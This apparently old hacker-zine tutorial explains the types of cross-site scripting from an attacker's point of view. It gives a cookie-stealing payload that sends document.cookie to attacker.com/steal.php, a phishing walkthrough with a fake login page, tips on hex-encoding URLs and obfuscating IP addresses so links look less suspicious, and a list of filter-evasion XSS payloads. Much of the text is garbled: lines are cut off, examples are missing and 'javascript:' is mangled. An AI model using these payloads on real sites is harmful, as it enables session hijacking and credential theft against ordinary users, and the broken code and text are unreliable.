XSS Attack [Explained]

07:21 ---

[SUMMARY ]---------------------------------------------------------------------
0x01: Introduction
0x02: Origins
0x03: Types of XSS
\_ 0x03a: DOM-Based
\_ 0x03b: Non-Persistent
\_ 0x03c: Persistent
0x04: Appendix
---[ 0x01: Introduction ]
Cross-site scripting (later commonly named
XSS to make difference from Cascading
Style Sheet) is a type of security vulnerability
that affects web applications
with not safely written code in not sanitized
input variables .
This kind of vulnerability allows an "attacker"
to inject some code into
the applications affected in order to bypass
access to the website or to apply
"phishing" on falls users (which is not
obviously our strict purpose )
As a matter of fact in vulnerables websites is
possible to execute HTML and
JavaScript codes from a not sanitized form,
which combined can be really
dangerous: it's possible to steal cookies or to
redirect webpages to builded
fake login in order to steal login usernames
and passwords.
This is commonly an underestimated problem
from websites masters, because actually
XSS cannot compromise actively the website
itself, but can only exploit ingenuous
It will take time already to get webmasters
look out to this kinds of
vulnerabilities: meanwhile we evenly disfrute
---[ 0x02: Origins ]
The name "Cross-Site Scripting" was conied by
Mark Slemko, the XSS pioneer,
and actually this name doesn't really reflect at
all the issues of this class of
vulnerability, and due to that he explained the
choice with the following answer:
"This issue isn't just about scripting, and there
isn't necessarily anything
cross-site about it. So why the name? It was
coined earlier on when the
problem was less understood, and it stuck.
Believe me, we have
had more important things to do than think of
a better name."
By the way the name was early adopted, but
in the years it came useful to abbreviate
it to XSS in order to not confuse with
Cascading-Style Sheets and Content-Scrumble
Starting from the Bugtraq community, the XSS
abbreviation became more and more
common as actually it is the "official"
reference to this vulnerability, and
obviously we will be conformed to this
---[ 0x03: Types of XSS ]
The term XSS is actually a bit elusive because
it includes differents kinds of
attacks that stands eachother on different
attacking mechanisms.
There are actually three types of Cross-Site
Scripting, commonly named as:
- DOM-Based XSS
- Non-persistent XSS
- Persistent XSS
Let's analize them one by one.
------[ 0x03a: DOM-Based ]
The DOM-Based Cross-Site Scripting allow to
an attacker to work not on a victim
website but on a victim local machine: the
various operative system usually includes
"since born" some HTML pages created for
differents aims, but as long as the humans
do mistakes this HTML pages often can be
exploited due to code vulnerabilities.
The DOM-Based XSS exploits these problems
on users local machines in this way:
- The attacker creates a well builded malicious
- The ingenuous user opens that site
- The user has a vulnerable page on his
- The attacker's website sends commands to
the vulnerable HTML page
- The vulnerable local page execute that
commands with the user's privileges
on that machine.
- The attacker easily gain control on the
victim computer.
As you can see it's quite simple practice, it's
just stands on brand new vulnerabilities
that comes out in the time, and there's never
This kind of attack is really dangerous
because it operates on the victim system
strictly and as long as the user doesn't look
after his security issues and doesn't
apply updates, the DOM-Based XSS will work
To prevent this kind of attacks there are only
two things to take care of:
- Doesn't visit untrusted website
- Keep your system up to date
------[ 0x03b: Non-Persistent ]
The non-persistent XSS are actually the most
commons vulnerabilities that can
be found on the Net.
It's commonly named as "non-persistent"
because it works on an immediate HTTP
response from the victim website: it show up
when the webpage get the data provided
by the attacker's client to automatically
generate a result page for the attackers
Standing on this the attacker could provide
some malicious code and try to make
the server execute it in order to obtain some
The most common applying of this kind of
vulnerability is in Search engines in
website: the attacker writes some arbitrary
HTML code in the search textbox and,
if the website is vulnerable, the result page
will return the result of these
HTML entities.
If this happens at 99% the Search engine will
execute also JavaScript arbitrary code.
For example assure that a website works like
Try to include some HTML tags in the "text"
text=<img src="http://attacker.com/
If the website is vulnerable it will display the
attacker's image into the result
Try then to write some JavaScript code:
Probably the website will return an alert
popup with the current Cookie for the
site itself.
That's not good at all
As you will see the vulnerable website will
execute any JavaScript code you
want to be run: sometimes you can find that
the website make some filters on " "
and ' ', but that's not really a big problem for
This vulnerability can be used by the attacker
to steal informations to users
of the victim website providing them for
example an email with an URL like:
To make that url less suspicious it will be
useful to encode the code in URL Hex value.
You can apply this tecnique using our
Playhack - Encoder service reachable at
(Beware that it's created for informational
purpose only ).
For example the code:
Encoded will look like:
And as comes the malicious url will turn from:
text=&l...t>alert ("XSS")</script>
Which, for a clueless user, it's lot less
suspicious than the first one.
Let's analize an example attack.
- The attacker realizes that the victim website
is vulnerable to XSS
- The attacker creates on his website an ad-
hoc page which is studied to steal
sensible informations like cookies or to make
a fake login of the victim website.
- The attacker provides to a user a crafted url
which contains a malicious
code like:
http://www.victim.com/search.php?text =
Encoded in Hex.
- The user visits the webpage and is obscurely
redirect the attacker's fakelogin
- The user is invited to log into the system
and he does.
- The fakelogin steals the username and
password of the victim.
The solution to this issue is simply to make a
check to the input code in the website
avoiding HTML tags or accepting alpha-
numerical characters only, with for example
codes like:
- Python: cgi.escape($code)
- PHP: eregi("[^a-zA-Z0-9_]", $code)
$code = htmlentities($code)
And many others.
------[ 0x03c: Persistent ]
The persistent XSS vulnerabilities are similar
to the second type (Non-persistent XSS),
because both works on a victim site and tries
to hack users informations;
the difference is that in websites vulnerables
to Persistent XSS the attacker
doesn't need to provide the crafted url to the
users, because the website
itself permits to users to insert fixed data into
the system: this is the case
for example of "guestbooks" (what an awful
item !!)
Usually the users uses that kind of tool to
leave messages to the owned of the
website and at a first look it doesn't seems
something dangerous, but if an attacker
discover that the system is vulnerable can
insert some malicious code in his message
and let ALL visitors to be victim of that.
This works when the tool provided (the
guestbook in the example) doesn't do any
on the content of the inserted message: it just
inserts the data provided from the user
into the result page.
The attacker could easily insert as much code
as he wants into the tool, for example:
<img src="jdocument.location
('http://attacker.com/steal.php?cookie=' .
Which allow the attacker to steal the cookie of
the victim user.
This is just an example of lots of possible
injection that can be done in the
vulnerable site.
The Persistent XSS due to is fixed feature is
obviously more dangerous than
the others, because can easily affects lots of
users with an unique attack.
The solution is the same of the Non-persistent
---[ 0x04: Appendix ]
In order to make the attack less suspicious it's
possible to "obfuscate" the IP
address of the attacker's website, encoding
the IP address with three formats:
- Dword Address
- Hex Address
- Octal Address
For example the ip address will look
- Dword: 2130706433
- Hex: 0x7f.0x00.0x00.0x01
- Octal: 0177.0000.0000.0001
Try for example:
And it will open your localhost webserver.
This tecnique is often used by XSS attacker
and in order to avoid to get caught
in attacker's trap, don't visit website that
doesn't contain a clear domain name
(and beware that is possible to fake that too
Here's a list of possible XSS cheats
<IMG SRC="jalert('XSS');">
<IMG SRC=jalert('XSS')>
<IMG SRC="jalert(String.fromCharCode
<SCRIPT/XSS SRC="http://example.com/
<iframe src=http://example.com/
scriptlet.html <
<INPUT TYPE="IMAGE" SRC="jalert('XSS');">
<BODY ONLOAD=alert(document.cookie)>
<IMG DYNSRC="jalert('XSS')">
<IMG DYNSRC="jalert('XSS')">
<BR SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image: url(jalert
<STYLE TYPE="text/javascript">alert('XSS');</
<STYLE type="text/css">BODY{background:url
<A HREF="jdocument.location='http://
# Anonymous_KnW
Cookie Stealing: